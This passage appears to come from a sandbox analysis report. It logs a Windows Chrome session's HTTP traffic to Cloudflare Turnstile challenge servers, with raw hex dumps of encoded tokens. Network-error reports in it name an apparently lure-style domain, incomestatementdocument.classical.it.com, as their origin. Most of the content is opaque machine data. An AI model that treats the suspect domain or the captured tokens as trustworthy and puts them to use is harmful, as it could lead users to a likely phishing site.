                                                                                        2025-03-20 17:46:43 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 76 65 51 6d 74 35 49 33 49 74 4c 47 38 6d 4d 4f 36 39 71 34 61 4f 54 6a 56 61 34 4c 55 68 68 69 42 76 65 4f 54 61 6a 48 78 46 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gveQmt5I3ItLG8mMO69q4aOTjVa4LUhhiBveOTajHxFQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2025-03-20 17:46:43 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.1649739104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:44 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 38627
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        cf-chl: 2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z
                                                                                        cf-chl-ra: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:44 UTC16384OUTData Raw: 69 57 68 33 63 4f 2d 38 56 58 68 72 4d 54 43 2d 66 49 70 35 68 77 36 2d 4c 6e 49 67 2d 49 71 71 33 35 57 77 66 36 49 4b 33 72 57 4f 66 49 71 75 6b 49 77 73 45 57 49 44 54 49 48 6e 33 73 35 4d 77 6e 46 72 35 73 2d 6f 49 6b 4b 77 44 49 67 73 2d 43 65 68 73 73 2d 35 6d 33 35 68 49 54 35 54 72 57 43 49 69 33 2d 6d 6e 49 64 73 2d 75 6d 49 75 4b 43 49 72 33 72 75 43 30 49 2d 76 76 68 51 37 34 4b 2d 36 36 77 2d 54 33 45 42 49 38 4b 49 41 73 4a 50 71 4d 78 72 67 75 32 75 70 49 72 32 48 49 54 75 49 50 50 33 49 5a 67 2d 4e 72 73 2d 51 54 33 2d 37 68 52 6b 73 49 42 50 70 47 45 6d 62 41 73 49 52 5a 4a 67 52 35 37 68 59 49 49 43 39 6b 49 49 6e 42 79 4b 49 73 73 2d 76 4d 33 49 34 49 42 55 50 49 42 61 49 4e 4b 49 74 75 67 50 6c 51 4b 2d 65 41 56 49 65 69 73 49 4f 49 49
                                                                                        Data Ascii: iWh3cO-8VXhrMTC-fIp5hw6-LnIg-Iqq35Wwf6IK3rWOfIqukIwsEWIDTIHn3s5MwnFr5s-oIkKwDIgs-Cehss-5m35hIT5TrWCIi3-mnIds-umIuKCIr3ruC0I-vvhQ74K-66w-T3EBI8KIAsJPqMxrgu2upIr2HITuIPP3IZg-Nrs-QT3-7hRksIBPpGEmbAsIRZJgR57hYIIC9kIInByKIss-vM3I4IBUPIBaINKItugPlQK-eAVIeisIOII
                                                                                        2025-03-20 17:46:44 UTC16384OUTData Raw: 72 42 54 69 77 31 4d 72 67 31 44 72 5a 62 4b 4c 30 31 31 4e 51 2d 38 55 33 2b 67 39 4c 57 69 78 79 4c 4a 71 54 4b 4b 2d 68 5a 46 2b 2d 49 2b 4d 41 77 49 77 41 54 30 67 71 71 2d 32 33 30 4a 61 46 33 24 77 64 4a 63 71 2d 49 72 68 31 46 6a 55 67 24 73 6f 4c 33 4f 47 50 49 46 33 4b 77 30 54 52 38 77 6c 67 31 73 52 38 4c 66 68 61 65 4e 54 37 49 4f 79 49 6a 49 75 4b 77 51 4b 52 38 54 4b 77 47 54 30 4c 63 4b 77 6c 4b 49 33 64 30 37 79 49 31 4c 77 7a 68 37 44 2d 70 77 7a 68 35 79 4d 64 62 2d 67 66 79 58 71 32 57 4f 4c 2b 4f 6a 4c 4b 33 75 56 6d 73 75 36 55 6e 65 42 61 2b 57 33 65 55 38 68 2d 61 4f 64 4b 5a 30 33 59 56 75 56 58 73 6e 50 33 72 73 4c 45 77 2b 4a 42 33 69 24 77 79 49 39 33 4d 51 77 2b 49 62 54 78 4d 72 5a 33 64 4b 72 4d 4c 54 2d 58 33 4d 2d 49 44 33
                                                                                        Data Ascii: rBTiw1Mrg1DrZbKL011NQ-8U3+g9LWixyLJqTKK-hZF+-I+MAwIwAT0gqq-230JaF3$wdJcq-Irh1FjUg$soL3OGPIF3Kw0TR8wlg1sR8LfhaeNT7IOyIjIuKwQKR8TKwGT0LcKwlKI3d07yI1Lwzh7D-pwzh5yMdb-gfyXq2WOL+OjLK3uVmsu6UneBa+W3eU8h-aOdKZ03YVuVXsnP3rsLEw+JB3i$wyI93MQw+IbTxMrZ3dKrMLT-X3M-ID3
                                                                                        2025-03-20 17:46:44 UTC5859OUTData Raw: 33 75 72 49 4b 2d 69 4e 4a 41 45 38 2b 4d 49 6c 43 4f 64 51 76 30 51 7a 45 2b 46 6d 35 33 66 66 2d 46 24 58 45 48 6e 68 71 24 58 48 39 36 38 34 6b 66 61 44 5a 56 2d 59 59 4b 4d 2d 39 6d 4b 38 34 6e 36 65 55 38 49 51 68 4f 56 49 5a 72 4c 59 64 73 71 47 78 56 4c 64 59 46 74 38 63 6b 4e 6a 70 71 6c 2b 73 4f 79 2b 64 36 61 38 6c 54 2d 46 24 37 30 34 65 38 65 6f 61 70 48 42 36 58 5a 7a 6f 36 37 74 36 4e 5a 56 43 6b 71 35 54 45 70 48 5a 34 68 54 24 7a 34 6a 5a 71 57 68 24 58 33 2d 32 5a 4a 73 72 32 36 73 72 6a 77 79 6d 71 7a 57 46 44 36 33 6b 77 5a 24 36 6e 69 36 5a 4a 43 6f 57 51 4d 56 50 44 4d 36 7a 74 5a 5a 24 6f 39 69 45 50 4a 39 6f 59 66 4d 51 69 72 52 64 79 34 41 5a 66 73 54 59 36 77 36 7a 55 34 59 74 6d 50 33 57 66 57 6d 33 48 61 6e 48 77 36 4a 72 39 38
                                                                                        Data Ascii: 3urIK-iNJAE8+MIlCOdQv0QzE+Fm53ff-F$XEHnhq$XH9684kfaDZV-YYKM-9mK84n6eU8IQhOVIZrLYdsqGxVLdYFt8ckNjpql+sOy+d6a8lT-F$704e8eoapHB6XZzo67t6NZVCkq5TEpHZ4hT$z4jZqWh$X3-2ZJsr26srjwymqzWFD63kwZ$6ni6ZJCoWQMVPDM6ztZZ$o9iEPJ9oYfMQirRdy4AZfsTY6w6zU4YtmP3WfWm3HanHw6Jr98
                                                                                        2025-03-20 17:46:44 UTC322INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:44 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 28188
                                                                                        Connection: close
                                                                                        cf-chl-gen: rp/CZM5WenicsN4co3sVIOGWMhp8u0o5SFcpIhb42zKWyM/N6+7qq8zURjTv9fph$rafv6mlNVW1F8bmmlNGD7w==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707d9fe638c6b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:44 UTC1047INData Raw: 57 47 4a 4b 55 56 39 37 6c 49 6d 4e 65 4a 53 4c 6b 33 42 38 57 6f 75 41 61 58 31 79 62 46 79 42 64 6e 47 53 6d 6f 64 31 68 4b 71 41 5a 35 42 76 6e 35 53 52 6a 59 69 34 68 4b 32 4c 6c 4c 75 62 6c 6f 35 35 6d 4a 44 44 6e 4c 4f 59 74 35 69 78 6d 36 58 48 71 36 58 45 69 61 75 6d 6e 63 36 4f 70 74 62 50 74 37 47 56 6c 62 69 75 75 62 6a 4b 74 39 62 46 73 64 50 49 75 4e 4b 37 33 4f 4c 71 31 2b 4c 52 76 74 2f 55 30 63 44 4f 36 4f 4c 76 7a 4f 2f 7a 32 39 62 30 75 64 37 56 33 64 7a 32 31 74 49 41 43 4f 66 39 34 63 30 43 36 65 58 6b 36 68 51 55 39 67 45 41 45 2b 33 53 46 77 63 58 44 41 38 43 38 64 34 57 41 75 41 43 45 78 34 41 34 68 34 4f 37 53 45 4a 4c 79 4d 45 2f 51 45 69 42 2b 34 7a 4c 77 77 74 42 68 77 5a 46 69 49 4f 4c 78 44 2b 4a 2f 34 6f 4f 69 41 44 54 45 6f
                                                                                        Data Ascii: WGJKUV97lImNeJSLk3B8WouAaX1ybFyBdnGSmod1hKqAZ5Bvn5SRjYi4hK2LlLublo55mJDDnLOYt5ixm6XHq6XEiaumnc6OptbPt7GVlbiuubjKt9bFsdPIuNK73OLq1+LRvt/U0cDO6OLvzO/z29b0ud7V3dz21tIACOf94c0C6eXk6hQU9gEAE+3SFwcXDA8C8d4WAuACEx4A4h4O7SEJLyME/QEiB+4zLwwtBhwZFiIOLxD+J/4oOiADTEo
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 38 6e 59 78 32 67 4b 4a 38 65 70 71 48 6c 58 35 34 73 47 71 77 71 32 6c 2b 67 71 69 75 65 4b 74 78 72 70 53 57 69 70 35 36 77 62 75 42 6b 4a 4b 34 76 6f 69 36 75 35 50 46 6f 61 69 76 77 36 43 63 73 37 2b 71 79 70 4c 58 79 4a 4f 75 6e 4e 4f 37 77 4c 54 4f 77 74 6e 53 74 72 44 44 34 62 66 61 78 2b 58 49 75 4d 2f 6a 76 2f 4c 4c 37 72 57 31 39 36 37 33 36 64 7a 55 36 74 2f 49 30 38 2f 7a 37 66 33 62 39 75 50 32 32 74 4d 47 39 4f 48 37 2f 4f 4c 4a 35 76 50 6f 36 2f 48 6b 45 39 45 4e 45 39 77 52 39 78 59 55 38 65 7a 37 44 76 4d 62 34 68 49 5a 34 2f 37 73 49 2b 59 52 2f 68 38 55 48 78 4d 51 42 76 41 57 43 6a 6f 79 4d 41 30 4a 4f 6a 59 43 41 78 73 6b 52 7a 59 70 47 54 63 73 4b 44 34 63 50 79 77 37 4a 46 4e 42 44 77 35 42 57 53 38 6e 54 6a 64 52 4e 7a 78 42 51 52
                                                                                        Data Ascii: 8nYx2gKJ8epqHlX54sGqwq2l+gqiueKtxrpSWip56wbuBkJK4voi6u5PFoaivw6Ccs7+qypLXyJOunNO7wLTOwtnStrDD4bfax+XIuM/jv/LL7rW196736dzU6t/I08/z7f3b9uP22tMG9OH7/OLJ5vPo6/HkE9ENE9wR9xYU8ez7DvMb4hIZ4/7sI+YR/h8UHxMQBvAWCjoyMA0JOjYCAxskRzYpGTcsKD4cPyw7JFNBDw5BWS8nTjdRNzxBQR
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 6f 57 4f 4b 71 6d 79 6d 69 36 2b 46 71 6f 2b 77 69 61 36 54 71 6f 32 79 6c 36 79 52 74 70 75 78 67 59 47 36 6f 6e 7a 46 71 4a 71 32 71 36 69 5a 71 4c 37 4e 79 61 61 4c 68 63 33 4b 77 4c 69 72 77 5a 61 56 71 37 69 33 77 4c 48 4f 77 36 2f 50 74 65 61 2f 34 73 6e 61 77 39 2b 37 33 37 76 76 32 75 4c 46 77 39 58 7a 38 2b 58 76 32 37 66 61 31 38 66 38 2b 41 41 42 2b 50 77 45 42 66 67 42 43 41 6e 30 42 51 77 4e 45 51 6b 51 45 51 37 6b 43 67 4c 34 45 52 67 5a 45 77 58 36 39 42 6e 72 36 69 51 50 47 4f 54 39 2b 52 7a 39 42 76 30 67 41 53 41 43 4a 41 50 39 42 69 67 47 4b 41 6f 73 43 6a 77 4f 4d 42 41 57 4c 51 38 66 50 68 67 6a 49 43 59 42 49 78 77 56 4f 79 77 68 43 41 68 4e 4a 51 35 50 56 41 77 6b 4f 53 6b 6f 44 56 55 6f 4a 6c 74 5a 4c 43 78 50 58 54 41 77 50 57 45
                                                                                        Data Ascii: oWOKqmymi6+Fqo+wia6Tqo2yl6yRtpuxgYG6onzFqJq2q6iZqL7NyaaLhc3KwLirwZaVq7i3wLHOw6/Ptea/4snaw9+737vv2uLFw9Xz8+Xv27fa18f8+AAB+PwEBfgBCAn0BQwNEQkQEQ7kCgL4ERgZEwX69Bnr6iQPGOT9+Rz9Bv0gASACJAP9BigGKAosCjwOMBAWLQ8fPhgjICYBIxwVOywhCAhNJQ5PVAwkOSkoDVUoJltZLCxPXTAwPWE
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 48 74 35 5a 4b 78 2f 66 62 4b 77 67 34 4f 6d 74 49 65 48 6c 4c 69 4c 69 72 36 38 6a 35 43 63 77 4a 4f 54 79 4c 75 74 68 63 4c 49 6d 35 76 46 79 72 43 53 30 4b 75 6e 74 73 61 34 32 73 66 57 75 39 2b 31 32 72 2f 67 75 64 37 44 32 72 33 69 78 39 7a 42 35 73 76 68 73 62 48 55 30 71 7a 31 32 4d 62 6d 32 39 65 31 31 4d 76 4c 36 4d 2f 32 77 62 34 46 78 4d 58 67 42 4e 6a 36 44 64 37 49 35 75 38 54 45 39 2f 54 34 67 6b 47 41 74 59 56 37 2b 33 61 47 66 50 77 33 68 33 33 38 75 49 68 2b 2f 7a 6d 4a 51 41 41 39 77 41 6c 44 78 6f 74 43 41 63 55 4b 68 4d 78 4f 44 6b 6f 4e 6a 4d 71 4b 78 51 50 4e 53 30 35 48 78 34 31 47 30 64 47 46 41 64 4f 49 67 34 62 48 30 56 54 46 55 63 4f 55 7a 41 77 58 42 67 37 4c 31 38 73 57 6c 67 33 51 30 56 6c 50 6a 46 67 56 46 74 58 62 53 59 75
                                                                                        Data Ascii: Ht5ZKx/fbKwg4OmtIeHlLiLir68j5CcwJOTyLuthcLIm5vFyrCS0Kuntsa42sfWu9+12r/gud7D2r3ix9zB5svhsbHU0qz12Mbm29e11MvL6M/2wb4FxMXgBNj6Dd7I5u8TE9/T4gkGAtYV7+3aGfPw3h338uIh+/zmJQAA9wAlDxotCAcUKhMxODkoNjMqKxQPNS05Hx41G0dGFAdOIg4bH0VTFUcOUzAwXBg7L18sWlg3Q0VlPjFgVFtXbSYu
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 43 4c 68 33 65 6d 6d 4c 71 6e 74 70 75 2f 6c 62 71 66 77 4a 6d 2b 6f 37 71 64 77 71 65 38 6f 63 61 72 78 70 75 6d 6b 4b 32 6e 31 4e 69 32 31 4c 6a 59 6d 4e 69 36 32 62 36 37 77 5a 79 2f 73 2b 57 69 34 62 6a 6e 32 4c 7a 71 36 4b 37 4f 7a 4d 47 73 7a 73 33 42 76 2b 6e 54 37 72 6d 32 2f 4c 33 4b 79 75 4b 38 31 75 4f 38 31 64 54 48 31 76 7a 73 7a 41 41 4f 43 76 7a 6a 45 74 48 4f 46 64 54 56 38 4f 59 4e 47 39 77 51 44 74 59 57 38 74 6e 6a 49 65 58 6c 47 4e 34 6f 4a 50 51 6b 47 51 6b 62 4d 65 6e 79 2f 44 58 72 42 54 51 6b 4f 51 63 79 47 78 63 30 2b 42 77 51 51 76 34 2b 46 55 51 31 47 30 64 47 46 43 73 6f 48 67 6b 72 49 53 30 2b 53 6a 45 51 46 68 4e 61 4d 43 38 7a 4b 31 46 66 49 56 52 56 58 7a 73 35 57 54 6c 69 4b 69 70 56 4e 57 78 66 58 31 78 42 51 6d 35 75 4b
                                                                                        Data Ascii: CLh3emmLqntpu/lbqfwJm+o7qdwqe8ocarxpumkK2n1Ni21LjYmNi62b67wZy/s+Wi4bjn2Lzq6K7OzMGszs3Bv+nT7rm2/L3KyuK81uO81dTH1vzszAAOCvzjEtHOFdTV8OYNG9wQDtYW8tnjIeXlGN4oJPQkGQkbMeny/DXrBTQkOQcyGxc0+BwQQv4+FUQ1G0dGFCsoHgkrIS0+SjEQFhNaMC8zK1FfIVRVXzs5WTliKipVNWxfX1xBQm5uK
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 59 6e 6f 64 2f 77 5a 61 42 6a 49 4f 31 77 35 32 78 74 34 53 35 71 73 47 2b 6b 4d 4f 74 6d 37 79 6e 6a 64 48 4d 71 63 6e 52 7a 71 2f 4f 32 61 79 7a 30 63 32 39 33 72 69 31 75 4b 43 2f 31 4d 72 4a 74 71 6d 71 6f 36 37 55 38 4d 6e 4f 7a 4f 61 72 38 73 6d 32 39 62 54 7a 75 64 73 43 35 4e 4c 79 35 76 55 45 32 50 76 59 2b 64 76 47 31 38 33 68 42 51 73 4f 41 41 67 48 42 76 58 6d 46 2f 33 79 31 39 66 63 33 75 38 69 44 68 72 37 43 51 45 58 43 2b 63 65 41 43 45 4a 2f 67 51 4d 4b 79 34 69 46 44 6b 76 47 43 72 30 47 43 59 4d 50 69 6f 32 4c 69 55 64 4d 79 63 45 4d 79 6f 44 46 44 34 6d 47 67 77 4c 50 6a 42 56 53 7a 52 47 45 54 52 43 4b 46 70 47 55 52 39 42 4f 55 39 45 4d 55 39 47 48 31 4a 5a 52 79 4a 71 4c 46 68 4f 59 31 73 76 51 47 70 67 61 44 42 6e 59 30 67 31 64 56
                                                                                        Data Ascii: Ynod/wZaBjIO1w52xt4S5qsG+kMOtm7ynjdHMqcnRzq/O2ayz0c293ri1uKC/1MrJtqmqo67U8MnOzOar8sm29bTzudsC5NLy5vUE2PvY+dvG183hBQsOAAgHBvXmF/3y19fc3u8iDhr7CQEXC+ceACEJ/gQMKy4iFDkvGCr0GCYMPio2LiUdMycEMyoDFD4mGgwLPjBVSzRGETRCKFpGUR9BOU9EMU9GH1JZRyJqLFhOY1svQGpgaDBnY0g1dV
                                                                                        2025-03-20 17:46:44 UTC1369INData Raw: 66 4c 43 6c 73 72 2b 71 68 4a 53 38 6f 4a 76 47 79 62 4c 46 69 39 43 39 79 72 69 54 72 62 50 52 31 61 2f 50 71 39 50 41 34 70 72 6b 78 75 57 65 34 4c 72 45 73 2b 57 2b 33 73 66 6a 30 76 50 6d 35 63 7a 71 31 37 50 4d 30 37 62 37 33 4c 58 4d 41 64 2f 51 76 77 48 75 2b 72 38 48 38 51 44 59 42 76 62 49 2b 67 4c 36 43 50 37 4e 41 51 73 54 45 67 50 6f 46 78 59 48 45 2f 51 66 43 39 73 66 33 52 44 31 39 43 63 53 34 79 73 70 44 75 6a 34 36 52 77 52 37 7a 49 66 38 42 6b 78 49 77 6f 46 4c 69 6b 7a 39 7a 30 74 4f 43 38 2f 4c 7a 73 41 52 79 6f 45 43 45 55 33 43 54 73 4b 4f 79 45 55 44 6b 46 4d 49 55 70 45 4f 56 64 56 53 43 30 59 58 30 70 58 59 31 35 52 49 44 31 6f 56 53 52 72 61 6c 63 39 4b 47 39 63 55 6b 46 78 56 6a 46 42 64 47 52 5a 64 33 74 70 4f 44 78 2b 62 54 78
                                                                                        Data Ascii: fLClsr+qhJS8oJvGybLFi9C9yriTrbPR1a/Pq9PA4prkxuWe4LrEs+W+3sfj0vPm5czq17PM07b73LXMAd/QvwHu+r8H8QDYBvbI+gL6CP7NAQsTEgPoFxYHE/QfC9sf3RD19CcS4yspDuj46RwR7zIf8BkxIwoFLikz9z0tOC8/LzsARyoECEU3CTsKOyEUDkFMIUpEOVdVSC0YX0pXY15RID1oVSRralc9KG9cUkFxVjFBdGRZd3tpODx+bTx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.1649741104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:44 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:44 UTC442INHTTP/1.1 400 Bad Request
                                                                                        Date: Thu, 20 Mar 2025 17:46:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: WzQ/QQ5z9hbikCEXeilinYu8tS40gxRmuz3uYgxGe412MZnwixeBVOLXBijfGZxDbhkJkWs3+Mq2/AYKj+w0gg==$0K5WM33cItRPYxqUEqikhg==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707de99240f77-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:44 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                                        Data Ascii: {"err":100280}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.164974735.190.80.14436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:24 UTC607OUTOPTIONS /report/v4?s=5PG5rqBK5bQAGLYUpan1%2B38a8JZjHcW4KjnJSA%2BOf34tC5FkLhZoPsJabv%2BP%2FmoNc%2BMg35XES74tn4LAAu8W%2BnIboJnVwfp9W%2BQ4dFgGAYAfztXHazm2A7jz95Z6OY1sndl%2Faw74OUA5QdSaThYZmMOqYB8OYWrcUOrM HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:24 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Thu, 20 Mar 2025 17:47:24 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.164974835.190.80.14436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:25 UTC582OUTPOST /report/v4?s=5PG5rqBK5bQAGLYUpan1%2B38a8JZjHcW4KjnJSA%2BOf34tC5FkLhZoPsJabv%2BP%2FmoNc%2BMg35XES74tn4LAAu8W%2BnIboJnVwfp9W%2BQ4dFgGAYAfztXHazm2A7jz95Z6OY1sndl%2Faw74OUA5QdSaThYZmMOqYB8OYWrcUOrM HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 482
                                                                                        Content-Type: application/reports+json
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:25 UTC482OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 37 36 30 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 36 37 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 63 6f 6d 65 73 74 61 74 65 6d 65 6e 74 64 6f 63 75 6d 65 6e 74 2e 63 6c 61 73 73 69 63 61 6c 2e 69 74 2e 63 6f 6d 2f 4e 43 36 74 53 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 36 2e 32 30 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65
                                                                                        Data Ascii: [{"age":57601,"body":{"elapsed_time":1678,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://incomestatementdocument.classical.it.com/NC6tS/","sampling_fraction":1.0,"server_ip":"172.67.216.207","status_code":404,"type":"http.e
                                                                                        2025-03-20 17:47:25 UTC214INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-allow-origin: *
                                                                                        vary: Origin
                                                                                        date: Thu, 20 Mar 2025 17:47:24 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.1649755104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:51 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 41078
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        cf-chl: 2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z
                                                                                        cf-chl-ra: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
